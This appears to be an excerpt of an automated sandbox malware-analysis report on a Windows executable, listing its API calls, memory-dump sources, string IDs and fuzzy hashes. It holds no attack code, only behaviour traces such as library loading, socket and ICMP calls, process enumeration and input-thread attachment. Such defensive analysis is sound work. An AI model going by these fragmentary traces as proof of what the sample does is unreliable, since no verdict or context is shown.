                                                                                                                • API String ID: 3705125965-3916222277
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                                • API String ID: 145871493-4132174516
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,?,C:\Users\user\Desktop\p4rsJEIb7k.exe,004A8E80,C:\Users\user\Desktop\p4rsJEIb7k.exe,0040F3D2), ref: 0040FFCA
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$FullMoveNameOperationPathlstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1148786053-1173974218
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                • GetFocus.USER32 ref: 004609EF
                                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 3342072951-1110647743
                                                                                                                • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                                • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 1515696956-2761332787
                                                                                                                • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                • DrawMenuBar.USER32 ref: 00449828
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                • Opcode ID: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                • Opcode Fuzzy Hash: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32(00000017,00416FB1), ref: 00416B00
                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,KERNEL32.DLL,?,00416FB1), ref: 004182F3
                                                                                                                • DeleteCriticalSection.KERNEL32(00000017,KERNEL32.DLL,?,00416FB1), ref: 0041831D
                                                                                                                  • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00411739,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 004169FB
                                                                                                                  • Part of subcall function 004169E9: TlsGetValue.KERNEL32(00000005,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00416A12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalDeleteSectionValue$Free
                                                                                                                • String ID: KERNEL32.DLL
                                                                                                                • API String ID: 3936257031-2576044830
                                                                                                                APIs
                                                                                                                • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,?,C:\Users\user\Desktop\p4rsJEIb7k.exe,004A8E80,C:\Users\user\Desktop\p4rsJEIb7k.exe,0040F3D2), ref: 0040FFCA
                                                                                                                  • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                  • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                  • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                  • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen
                                                                                                                • String ID: $OH$@OH$X
                                                                                                                • API String ID: 819131735-1394974532
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(mscoree.dll,?,00411810,00411739,?,00418376,000000FF,0000001E,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004), ref: 004117E2
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004117F2
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 1646373207-1276376045
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                • GetLastError.KERNEL32(?,00411376,00000000,00000010,?,?,?,00411402,00411766,0048C6A8,0000000C,0041142E,00411766,?,00411766), ref: 004226EB
                                                                                                                • GetLastError.KERNEL32(?,00411376,00000000,00000010,?,?,?,00411402,00411766,0048C6A8,0000000C,0041142E,00411766,?,00411766), ref: 00422778
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 4219743298-0
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2286883814-0
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                • #21.WSOCK32 ref: 004740E0
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1881357543-0
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004505BF
                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                Similarity
                                                                                                                • API ID: Proc$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2351499541-0
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2796087071-0
                                                                                                                • Opcode ID: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
